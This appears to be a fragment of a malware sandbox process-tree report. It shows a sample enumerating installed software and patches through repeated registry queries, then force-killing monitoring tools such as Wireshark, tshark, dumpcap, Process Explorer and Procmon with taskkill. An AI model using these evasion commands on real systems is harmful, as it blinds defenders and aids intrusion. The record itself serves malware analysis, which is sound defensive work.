-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1052
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173" /reg:643⤵PID:1012
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173" /reg:323⤵PID:784
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1924
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860" /reg:643⤵PID:2004
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860" /reg:323⤵PID:1508
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "procexp.exe" /T /F2⤵
- Kills process with taskkill
PID:1500
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1540
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655" /reg:643⤵PID:1472
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655" /reg:323⤵PID:1508
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2004
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743" /reg:643⤵PID:1060
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743" /reg:323⤵PID:1512
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1332
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063" /reg:643⤵PID:1500
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063" /reg:323⤵PID:1508
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1060
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573" /reg:643⤵PID:1604
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573" /reg:323⤵PID:1940
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1508
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132}.KB4087364" /reg:643⤵PID:1620
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132}.KB4087364" /reg:323⤵PID:1500
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1604
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{AC76BA86-7AD7-1033-7B44-A90000000001}" /reg:643⤵PID:1620
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{AC76BA86-7AD7-1033-7B44-A90000000001}" /reg:323⤵PID:1012
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1940
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{BB8B979E-E336-47E7-96BC-1031C1B94561}" /reg:643⤵PID:1012
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{BB8B979E-E336-47E7-96BC-1031C1B94561}" /reg:323⤵PID:2056
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2068
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" /reg:643⤵PID:2080
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" /reg:323⤵PID:2092
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2104
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}" /reg:643⤵PID:2116
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}" /reg:323⤵PID:2128
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2140
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}" /reg:643⤵PID:2152
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}" /reg:323⤵PID:2164
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "wireshark.exe" /T /F2⤵
- Kills process with taskkill
PID:2176
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "tshark.exe" /T /F2⤵
- Kills process with taskkill
PID:2224
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "text2pcap.exe" /T /F2⤵
- Kills process with taskkill
PID:2280
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "rawshark.exe" /T /F2⤵
- Kills process with taskkill
PID:2328
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "dumpcap.exe" /T /F2⤵
- Kills process with taskkill
PID:2376
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "capinfos.exe" /T /F2⤵
- Kills process with taskkill
PID:2424
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "Procmon.exe" /T /F2⤵
- Kills process with taskkill
PID:2472
-